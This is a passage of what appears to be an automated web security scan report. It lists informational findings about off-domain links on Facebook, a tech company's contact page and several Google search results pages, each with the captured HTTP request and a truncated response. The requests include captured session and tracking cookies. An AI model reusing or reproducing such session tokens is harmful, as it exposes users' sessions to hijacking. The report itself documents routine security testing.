20.74. http://www.facebook.com/terms.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /terms.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /terms.php?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.101.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 44962

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/terms.php";window._EagleEyeSeed="2lBU";</script><noscript
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/bEQSDvXrQUO.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

20.75. http://www.fastteks.com/TechSolutions/Contact-Us.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastteks.com
Path:   /TechSolutions/Contact-Us.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /TechSolutions/Contact-Us.aspx?id=443 HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/Services.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448; .ASPXANONYMOUS=_eAUs758zAEkAAAANjdjMWRjYjktMWFjYy00MTAxLThkNzItMjgxMzBiMTMwNGUw8ijUH0Cv7Pat0Vj-1z-ShfMdhM01; ASP.NET_SessionId=2exsmk55wscz5545na1jov45; __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.2.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:00:43 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 125293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...
<br /><a href="http://www.352media.com/webapplication.aspx" target="_blank">Web Application Development</a> by <a href="http://www.352media.com" target="_blank">Web Design Company</a>
...[SNIP]...

20.76. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?hl=en&client=firefox-a&hs=wQf&rls=org.mozilla%3Aen-US%3Aunofficial&q=%22ArgumentOutOfRangeException%22+exploit&aq=f&aqi=&aql=&oq= HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=%22ArgumentOutOfRangeException%22&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-a
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 23:35:53 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 79275

<!doctype html><head><title>&quot;ArgumentOutOfRangeException&quot; exploit - Google Search</title><script>window.google={kEI:"2RQmTu2mM6mp0AHquKm2Cg",kEXPI:"17259,28505,28936,29859,30316,30465,30727,
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?hl=en&client=firefox-a&hs=wQf&rls=org.mozilla:en-US:unofficial&q=%22ArgumentOutOfRangeException%22+exploit&um=1&ie=UTF-8&sa=N&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://raykoid666.wordpress.com/2010/01/26/rc4-encryption-code-snippet-in-vb-net-vb5vb6-c-c/" class=l onmousedown="return rwt(this,'','','','1','AFQjCNHXki7xh-5SC9iP4xJmq_Gg6dijKw','','0CBkQFjAA')">RC4 encryption code snippet in VB5/VB6, C#, C++ .. The Exploitant</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6uVjn3WcJ4UJ:raykoid666.wordpress.com/2010/01/26/rc4-encryption-code-snippet-in-vb-net-vb5vb6-c-c/+%22ArgumentOutOfRangeException%22+exploit&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNF6pahSWAKTkeZKFqajbk4Z9iPO9Q','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.elitepvpers.com/forum/aion-hacks-bots-cheats-exploits/597916-angelbot-1-2-6-free-2.html" class=l onmousedown="return rwt(this,'','','','2','AFQjCNE7ElrBe8FkCjvsmIpzpxZuyH9_Qw','','0CB0QFjAB')">Angelbot 1.2.6 (Free) - Page 2</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2QH6_aQ15LYJ:www.elitepvpers.com/forum/aion-hacks-bots-cheats-exploits/597916-angelbot-1-2-6-free-2.html+%22ArgumentOutOfRangeException%22+exploit&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNH2426mmZB25FMarLgyy1kOSs6Lzg','','0CCgQIDAB')">Cached</a>
...[SNIP]...
<div class="fc"><a href="http://www.elitepvpers.com/forum/co2-exploits-hacks-tools/61331-co-memory-tool-3.html" onmousedown="return rwt(this,'','','','2','AFQjCNF2pA3LRcqrlN3sXhFnAau2SBigcw','','0CCAQrAIoADAB')">CO Memory Tool... - Page 3</a>
...[SNIP]...
<br><a href="http://www.elitepvpers.com/forum/shaiya-hacks-bots-cheats-exploits/432469-pre-release-shaiya-packet-bot-lilprohacker.html" onmousedown="return rwt(this,'','','','2','AFQjCNHW4vEanp-4quTyLIUl5lnI897yZw','','0CCEQrAIoATAB')">[Pre-Release] Shaiya Packet Bot By lilprohacker</a>
...[SNIP]...
<br><a href="http://www.elitepvpers.com/forum/co2-exploits-hacks-tools/250645-uco-projects-thread-conquer-exe-itemtype-dat-5162-a-26.html" onmousedown="return rwt(this,'','','','2','AFQjCNGAXGiG_jVBIonlZd0F-hzOlSuEKQ','','0CCIQrAIoAjAB')">UCO Projects Thread (Conquer.exe, Itemtype.dat) [5162] - Page 26</a>
...[SNIP]...
<br><a href="http://www.elitepvpers.com/forum/co2-exploits-hacks-tools/69124-speed-zoom-hack-non-dc-always-updated-13.html" onmousedown="return rwt(this,'','','','2','AFQjCNE2mnsOyd_vqgXWA8lQhgdk70GqMQ','','0CCMQrAIoAzAB')">Speed+Zoom Hack Non Dc Always Updated - Page 13</a>
...[SNIP]...
<h3 class="r"><a href="http://msdn.microsoft.com/en-us/library/system.web.ui.webcontrols.listcontrol.selectedvalue(v=vs.85).aspx" class=l onmousedown="return rwt(this,'','','','3','AFQjCNF3DqVy4PBOuybpxXWs9AipfOk91w','','0CCkQFjAC')">ListControl.SelectedValue Property (System.Web.UI.WebControls)</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6BkuugxiAe0J:msdn.microsoft.com/en-us/library/system.web.ui.webcontrols.listcontrol.selectedvalue(v%3Dvs.85).aspx+%22ArgumentOutOfRangeException%22+exploit&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNFS8X8gVKfrYotWfTUpGtfBsQqFEw','','0CCsQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://cheatingnetwork.net/forums/public-bot-exploit-releases/74342-release-adf-ly-auto-clicker.html" class=l onmousedown="return rwt(this,'','','','4','AFQjCNFMC1pos3m3PDD3BPydaYYF83nAFw','','0CCwQFjAD')">[Release] Adf.ly Auto clicker</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:q0PrvCtmHjoJ:cheatingnetwork.net/forums/public-bot-exploit-releases/74342-release-adf-ly-auto-clicker.html+%22ArgumentOutOfRangeException%22+exploit&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','4','AFQjCNFHe6XbTBhHMIdzKPP1xBr948gv9Q','','0CC4QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://cheatingnetwork.net/forums/gomez-peer-zone/58456-gomez-peer-zone-exploit-enhancer-5.html" class=l onmousedown="return rwt(this,'','','','5','AFQjCNE_UUuDYKNoYzyKZ0Gihq5u9MUdVQ','','0CC8QFjAE')">Gomez Peer Zone <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:FP2V-312bG4J:cheatingnetwork.net/forums/gomez-peer-zone/58456-gomez-peer-zone-exploit-enhancer-5.html+%22ArgumentOutOfRangeException%22+exploit&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','5','AFQjCNF_ZCnaImzarprxwQOUMkOlJt-epQ','','0CDEQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.codeproject.com/KB/edit/AvalonEdit.aspx?msg=3466323" class=l onmousedown="return rwt(this,'','','','6','AFQjCNGgCXzy24qu59UIztXgwAz4oEqOZA','','0CDMQFjAF')">Using AvalonEdit (WPF Text Editor) - CodeProject</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rr93tRmoz3EJ:www.codeproject.com/KB/edit/AvalonEdit.aspx%3Fmsg%3D3466323+%22ArgumentOutOfRangeException%22+exploit&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','6','AFQjCNGNFhfsGlAqaREX9Tkv1E5cvHfZCg','','0CDgQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://reflector.webtropy.com/default.aspx/Net/Net/3@5@50727@3053/DEVDIV/depot/DevDiv/releases/Orcas/SP/wpf/src/Core/CSharp/MS/Internal/MemoryPressure@cs/1/MemoryPressure@cs" class=l onmousedown="return rwt(this,'','','','7','AFQjCNE7wZ-M8cwHvrmjUOyyUFYO82sBVg','','0CDkQFjAG')">MemoryPressure.cs source code in C# .NET</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-y47Wab7JbAJ:reflector.webtropy.com/default.aspx/Net/Net/3%405%4050727%403053/DEVDIV/depot/DevDiv/releases/Orcas/SP/wpf/src/Core/CSharp/MS/Internal/MemoryPressure%40cs/1/MemoryPressure%40cs+%22ArgumentOutOfRangeException%22+exploit&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNHWP5m_-6Rjkt5QxHN4Q0uKCnBmFg','','0CDsQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ffxiscripting.com/viewtopic.php?p=31019" class=l onmousedown="return rwt(this,'','','','8','AFQjCNG6TRHr38Li9Msry4qh6l85ISDimQ','','0CDwQFjAH')">Post - ffxiscripting MMORPG Bots Macros Hacks <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6MrK-KHcjs0J:www.ffxiscripting.com/viewtopic.php%3Fp%3D31019+%22ArgumentOutOfRangeException%22+exploit&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','8','AFQjCNGykcDRUSmRCbDK37OcpQHW65C78Q','','0CEAQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.elitepvpers.de/forum/co2-exploits-hacks-tools/61331-co-memory-tool-3.html" class=l onmousedown="return rwt(this,'','','','9','AFQjCNF8RgG9GkY2HN1wmoCgM3RP2FmaYA','','0CEEQFjAI')">CO Memory Tool... - Page 3</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mvzPMW8Q5ScJ:www.elitepvpers.de/forum/co2-exploits-hacks-tools/61331-co-memory-tool-3.html+%22ArgumentOutOfRangeException%22+exploit&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNFmfhfA1eKhrYsgKusdrAXCj8b4nQ','','0CEcQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://mikehofer.blogspot.com/2007/07/parameter-validation-framework.html" class=l onmousedown="return rwt(this,'','','','10','AFQjCNGqBaAK2C_789KubJ_qeHRrlc64lA','','0CEgQFjAJ')">Coding from the Trenches: A Parameter Validation Framework</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nniDTeL_5VAJ:mikehofer.blogspot.com/2007/07/parameter-validation-framework.html+%22ArgumentOutOfRangeException%22+exploit&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNEY5wJkGVqq_GtwHy3u_SYAtZhARw','','0CEoQIDAJ')">Cached</a>
...[SNIP]...

20.77. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=Server+Error+in+%27%2F%27+Application.--------------------------------------------------------------------------------startIndex+cannot+be+larger+than+length+of+string.Parameter+name%3A+startIndexDescription%3A+An+unhandled+exception+occurred+during+the+execution+of+the+current+web+request.+Please+review+the+stack+trace+for+more+information+about+the+error+and+where+it+originated+in+the+code.Exception+Details%3A+System.ArgumentOutOfRangeException%3A+startIndex+cannot+be+larger+than+length+of+string.Parameter+name%3A+startIndex%5C HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 23:35:02 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 74403

<!doctype html><head><title>Server Error in &#39;/&#39; Application.--------------------------------------------------------------------------------startIndex cannot be larger than length of string.Pa
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?oe=UTF-8&gfns=1&q=Server+Error+in+%27/%27+Application.--------------------------------------------------------------------------------startIndex+cannot+be+larger+than+length+of+string.Parameter+name:+startIndexDescription:+An+unhandled+exception+occurred+during+the+execution+of+the+current+web+request.+Please+review+the+stack+trace+for+more+information+about+the+error+and+where+it+originated+in+the+code.Exception+Details:+System.ArgumentOutOfRangeException:+startIndex+cannot+be+larger+than+length+of+string.Parameter+name:+startIndex%5C&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...

20.78. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?hl=en&q=Waterfront-media HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:19:02 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76417

<!doctype html><head><title>Waterfront-media - Google Search</title><script>window.google={kEI:"tuYlTuabMaTb0QG_89HiCg",kEXPI:"17259,28505,29859,30316,30465,30727,31388,31406,31493",kCSI:{e:"17259,285
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?hl=en&q=Waterfront-media&um=1&ie=UTF-8&sa=N&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://corporate.everydayhealth.com/" class=l onmousedown="return rwt(this,'','','','1','AFQjCNHABxMIlzi-Z9-GYytDSaro2mdJUw','','0CBoQFjAA')">Everyday Health Homepage</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jkjxXHVamKIJ:corporate.everydayhealth.com/+Waterfront-media&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNF2vYFSu9bFZNxIovdqn5vSj6QdZA','','0CBwQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://corporate.everydayhealth.com/contact-eh.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNGmaNIlR74g29PdDkenSCOenuFBsA','','0CB4QqwMoADAA')">Contact</a></div><div class=sld><a class=sla href="http://corporate.everydayhealth.com/about-eh.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNFk3pRjRewLcWpzyCuPlu1ZbYFKWg','','0CB8QqwMoATAA')">The Company</a>
...[SNIP]...
<div class=sld><a class=sla href="http://corporate.everydayhealth.com/about-eh-sites.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNHUfnkZqe5hBZBmP2t_kaUDjCGiog','','0CCAQqwMoAjAA')">Our Partners</a>
...[SNIP]...
<div class=sld><a class=sla href="http://corporate.everydayhealth.com/press-releases.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNE8VNZ1aWNtx-CkiUBBd3hEuNT_nQ','','0CCEQqwMoAzAA')">Press Releases</a>
...[SNIP]...
<div class=sld><a class=sla href="http://corporate.everydayhealth.com/in-the-news.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNHRGvno_OaCCY2l6JBhID8DsnGA7w','','0CCIQqwMoBDAA')">News</a></div><div class=sld><a class=sla href="http://corporate.everydayhealth.com/advertise-with-eh.aspx" onmousedown="return rwt(this,'','','','1','AFQjCNHcEkApkmk7T4spTgZrLGFoFoeH6w','','0CCMQqwMoBTAA')">Advertise</a>
...[SNIP]...
<h3 class="r"><a href="http://corporate.everydayhealth.com/about-eh.aspx" class=l onmousedown="return rwt(this,'','','','2','AFQjCNFk3pRjRewLcWpzyCuPlu1ZbYFKWg','','0CCYQFjAB')">About Everyday Health</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZimqRv6PxMAJ:corporate.everydayhealth.com/about-eh.aspx+Waterfront-media&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNF4dhmHyCmHka0HlkGzqaja2wY4cw','','0CCgQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.crunchbase.com/company/waterfrontmedia" class=l onmousedown="return rwt(this,'','','','3','AFQjCNFPWWe2R7mvY_kHjtc6iOyNfZoXmw','','0CCsQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:RMEBPek4Xc4J:www.crunchbase.com/company/waterfrontmedia+Waterfront-media&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNEM7XsZcaXRWxmd2LkexMlq4SBvWw','','0CC8QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://paidcontent.org/tag/waterfront-media/" class=l onmousedown="return rwt(this,'','','','4','AFQjCNHKaTSFHkmbCMIhpJmFrd_LAukW2g','','0CDIQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:cdhKWzb2NHcJ:paidcontent.org/tag/waterfront-media/+Waterfront-media&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','4','AFQjCNFsA9b6PVRu7wOA3Hoyz2Q6eWnk-g','','0CDQQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://paidcontent.org/article/419-revolution-health-waterfront-media-plan-merger-to-compete-with-webmd/" class=l onmousedown="return rwt(this,'','','','5','AFQjCNE2OfnVtA_BCcD3X9rX_atF54pTIQ','','0CDYQFjAE')">Revolution Health, <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tT8Hgqih-1UJ:paidcontent.org/article/419-revolution-health-waterfront-media-plan-merger-to-compete-with-webmd/+Waterfront-media&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','5','AFQjCNF6iL7QUAGYI9SbF3QsnYTY117y2A','','0CDgQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.inc.com/inc5000/2009/company-profile.html?id=200922660" class=l onmousedown="return rwt(this,'','','','6','AFQjCNHj8g-dh2jFtoDKX_GvdFYGj_tG9g','','0CDsQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jt6O1nOMIlQJ:www.inc.com/inc5000/2009/company-profile.html%3Fid%3D200922660+Waterfront-media&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','6','AFQjCNEPf12ntKGEWAjLFHw6MWc5S3jqbw','','0CD0QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jillianmichaels.com/iphone.aspx" class=l onmousedown="return rwt(this,'','','','7','AFQjCNHaBYblRnzsNhwUij6B__fWfowMCg','','0CD8QFjAG')">Jillian Michaels&#39;s Fitness Motivation iPhone and iPod Touch App</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:waKP4vGo2u0J:www.jillianmichaels.com/iphone.aspx+Waterfront-media&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNFKuMg__Zk81J1aesXjUr6NQw6ASQ','','0CEEQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mmm-online.com/look-out-webmd-waterfront-media-to-merge-with-revolution-health/article/118736/" class=l onmousedown="return rwt(this,'','','','8','AFQjCNF_Ex_m_i9aBZqw_ojJT_i8W4-2Ng','','0CEMQFjAH')">Look out WebMD: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:RXCFjIDWUWAJ:www.mmm-online.com/look-out-webmd-waterfront-media-to-merge-with-revolution-health/article/118736/+Waterfront-media&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','8','AFQjCNGoRCai9GHEGuAUyYHAdBWn6hlqSA','','0CEcQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.southbeachdiet.com/sbd/publicsite/south-beach-diet-iphone-app.aspx" class=l onmousedown="return rwt(this,'','','','9','AFQjCNFoGi4WmllpejDqo3AJMHt4KK_kOQ','','0CEkQFjAI')">South Beach Diet iPhone App</a>
...[SNIP]...
